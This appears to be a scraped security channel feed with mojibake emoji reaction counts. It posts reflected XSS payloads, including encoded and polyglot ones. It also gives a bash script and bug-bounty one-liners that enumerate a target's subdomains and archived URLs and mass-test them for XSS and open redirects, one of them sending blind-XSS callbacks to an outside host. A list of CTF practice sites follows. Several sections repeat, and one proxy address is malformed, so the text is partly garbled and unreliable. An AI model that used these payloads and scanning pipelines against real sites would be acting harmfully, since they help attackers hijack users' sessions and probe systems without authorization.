Top 3 RXSS payloads
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
β€6π₯3β€βπ₯1π1
Simple Reflected XSS
1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs
π₯°7π₯3
Brut Security
Simple Reflected XSS 1. subfinder -d target .com | httprobe -c 100 > target.txt 2. cat target.txt | waybackurls | gf xss | kxxs
For Automation Reflected XSS Scanning
#!/bin/bash
# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain
# Define output file
output_file="scan_output.txt"
# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt
# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"
# Display output file location
echo "Scan output saved to $output_file"
π₯6β€2
π¨Toxicacheπ¨
πGolang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πhttps://lnkd.in/gdtpJGmT
πGolang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πhttps://lnkd.in/gdtpJGmT
β‘5β€3π₯2π1π1
Awesome Bug Bounty One-liners
A collection of awesome one-liner scripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
π Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
A collection of awesome one-liner scripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
π Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
π10π₯5
Useful XSS payloads:
"/*\"/*`/*' /*</template> </textarea></noembed></noscript></title> </style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTIGJ5IFZpY2tpZScpPC9zY3JpcHQ+"
data:text/html,<script>alert(1)</script>
<select><noembed></select><script x='a@b'a>
β€11π4π1π₯1
Cyber Security Lab Practice, RED & BLUE Team.
πAttack-Defense - https://attackdefense.com
πAlert to win - https://aalf.nu/alert1
πBancocn - https://bancocn.com
πBuffer Overflow Labs - https://lnkd.in/eNbEWYh
πCTF Komodo Security - https://ctf.komodosec.com
πCryptoHack - https://cryptohack.org/
πCMD Challenge - https://cmdchallenge.com
πExplotation Education - https://exploit.education
πGoogle CTF - https://lnkd.in/e46drbz8
πHackTheBox - Dr. AITH - https://www.hackthebox.com
πHackthis - https://www.hackthis.co.uk
πHacksplaining - https://lnkd.in/eAB5CSTA
πHacker101 - https://ctf.hacker101.com
πCapture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
πHacking-Lab - https://hacking-lab.com/
πImmersiveLabs - https://immersivelabs.com
πNewbieContest - https://lnkd.in/ewBk6fU5
πOverTheWire - https://overthewire.org
πPractical Pentest Labs - https://lnkd.in/esq9Yuv5
πPentestlab - https://pentesterlab.com
πPenetration Testing Practice Labs - https://lnkd.in/e6wVANYd
πPentestIT LAB - https://lab.pentestit.ru
πPicoCTF - https://picoctf.com
πPWNABLE - https://lnkd.in/eMEwBJzn
πRoot-Me - https://www.root-me.org
πRoot in Jail - https://rootinjail.com
πSANS Challenger - https://lnkd.in/e5TAMawK
πSmashTheStack - https://lnkd.in/eVn9rP9p
πThe Cryptopals Crypto Challenges - https://cryptopals.com
πTry Hack Me - https://tryhackme.com
πVulnhub - https://www.vulnhub.com
πVulnmachine - https://lnkd.in/eJ2e_kD
πW3Challs - https://w3challs.com
πWeChall - https://www.wechall.net
πWebsploit - https://websploit.org/
πZenk-Security - https://lnkd.in/ewJ5rNx2
πCyberdefenders - https://lnkd.in/dVcmjEw8
πLetsDefend- https://letsdefend.io/
πAttack-Defense - https://attackdefense.com
πAlert to win - https://aalf.nu/alert1
πBancocn - https://bancocn.com
πBuffer Overflow Labs - https://lnkd.in/eNbEWYh
πCTF Komodo Security - https://ctf.komodosec.com
πCryptoHack - https://cryptohack.org/
πCMD Challenge - https://cmdchallenge.com
πExplotation Education - https://exploit.education
πGoogle CTF - https://lnkd.in/e46drbz8
πHackTheBox - Dr. AITH - https://www.hackthebox.com
πHackthis - https://www.hackthis.co.uk
πHacksplaining - https://lnkd.in/eAB5CSTA
πHacker101 - https://ctf.hacker101.com
πCapture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
πHacking-Lab - https://hacking-lab.com/
πImmersiveLabs - https://immersivelabs.com
πNewbieContest - https://lnkd.in/ewBk6fU5
πOverTheWire - https://overthewire.org
πPractical Pentest Labs - https://lnkd.in/esq9Yuv5
πPentestlab - https://pentesterlab.com
πPenetration Testing Practice Labs - https://lnkd.in/e6wVANYd
πPentestIT LAB - https://lab.pentestit.ru
πPicoCTF - https://picoctf.com
πPWNABLE - https://lnkd.in/eMEwBJzn
πRoot-Me - https://www.root-me.org
πRoot in Jail - https://rootinjail.com
πSANS Challenger - https://lnkd.in/e5TAMawK
πSmashTheStack - https://lnkd.in/eVn9rP9p
πThe Cryptopals Crypto Challenges - https://cryptopals.com
πTry Hack Me - https://tryhackme.com
πVulnhub - https://www.vulnhub.com
πVulnmachine - https://lnkd.in/eJ2e_kD
πW3Challs - https://w3challs.com
πWeChall - https://www.wechall.net
πWebsploit - https://websploit.org/
πZenk-Security - https://lnkd.in/ewJ5rNx2
πCyberdefenders - https://lnkd.in/dVcmjEw8
πLetsDefend- https://letsdefend.io/
β€8π2π₯1